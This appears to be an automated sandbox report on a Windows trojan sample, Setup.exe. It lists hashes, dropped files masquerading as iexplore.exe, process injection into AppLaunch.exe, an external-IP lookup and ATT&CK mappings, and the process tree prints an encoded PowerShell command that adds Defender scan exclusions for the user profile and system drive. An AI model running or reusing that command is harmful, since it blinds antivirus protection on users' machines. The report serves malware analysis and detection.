c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf

General

Target

Setup.exe
Size

4.6MB
MD5

62ed80f638e9551e1e59b4ea9341bccd
SHA1

44196e8cb0f5774decf60e12215767f092c3c008
SHA256

c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf
SHA512

56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Score

8^/10

evasion trojan

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

iexplor.exeiexplore.exe

pid process

2040 iexplor.exe
1780 iexplore.exe
Loads dropped DLL 2 IoCs

Processes:

Setup.exe

pid process

988 Setup.exe
988 Setup.exe
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

iexplore.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

pid	process
2040	iexplor.exe
1780	iexplore.exe

pid	process
988	Setup.exe
988	Setup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe

flow	ioc
4	ip-api.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

iexplor.exe

description pid process target process

PID 2040 set thread context of 1476 2040 iexplor.exe AppLaunch.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

784 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

AppLaunch.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1476 AppLaunch.exe
Token: SeDebugPrivilege 784 powershell.exe

description	pid	process	target process
PID 2040 set thread context of 1476	2040	iexplor.exe	AppLaunch.exe

pid	process
784	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1476	AppLaunch.exe
Token: SeDebugPrivilege	784	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

Setup.exeiexplor.exeiexplore.execmd.exe

description	pid	process	target process
PID 988 wrote to memory of 2040	988	Setup.exe	iexplor.exe
PID 988 wrote to memory of 2040	988	Setup.exe	iexplor.exe
PID 988 wrote to memory of 2040	988	Setup.exe	iexplor.exe
PID 988 wrote to memory of 2040	988	Setup.exe	iexplor.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 2040 wrote to memory of 1476	2040	iexplor.exe	AppLaunch.exe
PID 988 wrote to memory of 1780	988	Setup.exe	iexplore.exe
PID 988 wrote to memory of 1780	988	Setup.exe	iexplore.exe
PID 988 wrote to memory of 1780	988	Setup.exe	iexplore.exe
PID 988 wrote to memory of 1780	988	Setup.exe	iexplore.exe
PID 1780 wrote to memory of 1192	1780	iexplore.exe	cmd.exe
PID 1780 wrote to memory of 1192	1780	iexplore.exe	cmd.exe
PID 1780 wrote to memory of 1192	1780	iexplore.exe	cmd.exe
PID 1192 wrote to memory of 784	1192	cmd.exe	powershell.exe
PID 1192 wrote to memory of 784	1192	cmd.exe	powershell.exe
PID 1192 wrote to memory of 784	1192	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:988

C:\Users\Admin\AppData\Local\Temp\iexplor.exe
C:\Users\Admin\AppData\Local\Temp\iexplor.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Users\Admin\AppData\Local\Temp\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\iexplor.exe
Filesize
500.9MB

MD5
4d410d5f11c69b43bad03c13f4815c74

SHA1
b31d06d687d4256f65d95a6272d96f92e8521fce

SHA256
a1189d1f57ce1974477fd6a90eb8e31682730cfbe961015525d493205aa6b3d7

SHA512
b40293e331dbef46a5024f3fb726e7dd803f35a233739e6f50d391e0f18b7f8ae81b5b2b7a9b5d2f88ba38197a30e0fbe20e0040de0496fe6c6d77b583934e63

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
236.6MB

MD5
8c8d1995e855a5bcbf12c6c32a67827b

SHA1
e76880d87a9b00980b396810ce7f2dd0709e8417

SHA256
eee04766cc197f34eb2142b7b47308eb271997e8631442436b1fee937997eedb

SHA512
4de191b0b83dcda35182a073c3341acd051fbc364dec7d50ff81daa169c70a089ca432a1fb1ec7485af774889ea6eb7d3353c3c6002a167f74404bd7b1548158

Download Submit
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
221.9MB

MD5
b1d5c9d75d8ee0b7b5e9fa3a9df6f8f3

SHA1
d20070114eb39e24d23e0fe9c58c177c10aa3a3e

SHA256
9636b9627c3b377a152cfb3d3d41b24eb33e04698f4ec734829bbbbe7ee42c50

SHA512
ec0b98e0d6bc4b2619d364b2a252f4755b60cad7eb265455031002c4f734e51471961b670030baa32fa611d17eba2654b41cc7a2a68295d370d2e2a61fee63ed

Download Submit
\Users\Admin\AppData\Local\Temp\iexplor.exe
Filesize
514.5MB

MD5
a590f5eefd4ab8c2d00c37070ac4ed45

SHA1
301f0f07e27c570cc293c0c700234bbb0e5fea1a

SHA256
44672ebb7315f93e3e80e7491ca1c413b33c33df1457e8d5328c6c935f8d1d32

SHA512
2f14d5b09e4d801184279db160b7c3aab94d7c3d81c94179a9f11c249940857d7ed5418911e07c9a3d67236aa68a9f456a319693432dfc5b28548e8aa3162470

Download Submit
\Users\Admin\AppData\Local\Temp\iexplore.exe
Filesize
269.8MB

MD5
c1d88747250179492a57ffb9d652b281

SHA1
fb53e60f9ce551e7a7d8f25394c62cdc3e4e280d

SHA256
0ab1a051971db469effda5b0ccd2300f85258bc8eb982d8a40ea527167082d06

SHA512
591b5faa8a93f4f153dc9a76ffc3c5924b4ca0229ca729fa17faa14b42a0ce530bf4b5d5742f75a0f2fa2f26eaa6620c3be80aed2e694e0c7e3a35076cf49c26

Download Submit
memory/784-77-0x0000000000000000-mapping.dmp

Download
memory/784-81-0x0000000001FC4000-0x0000000001FC7000-memory.dmp

Filesize
12KB

Download
memory/784-80-0x000007FEEBE70000-0x000007FEEC9CD000-memory.dmp

Filesize
11.4MB

Download
memory/784-82-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/784-79-0x000007FEEC9D0000-0x000007FEED3F3000-memory.dmp

Filesize
10.1MB

Download
memory/784-83-0x0000000001FCB000-0x0000000001FEA000-memory.dmp

Filesize
124KB

Download
memory/988-54-0x0000000075C71000-0x0000000075C73000-memory.dmp

Filesize
8KB

Download
memory/1192-76-0x0000000000000000-mapping.dmp

Download
memory/1476-58-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1476-67-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1476-66-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1476-65-0x000000000041CE12-mapping.dmp

Download
memory/1476-60-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1780-70-0x0000000000000000-mapping.dmp

Download
memory/1780-75-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp

Filesize
8KB

Download
memory/1780-74-0x000000001C8E0000-0x000000001CADA000-memory.dmp

Filesize
2.0MB

Download
memory/1780-73-0x000000013F0F0000-0x000000013F30C000-memory.dmp

Filesize
2.1MB

Download
memory/2040-56-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing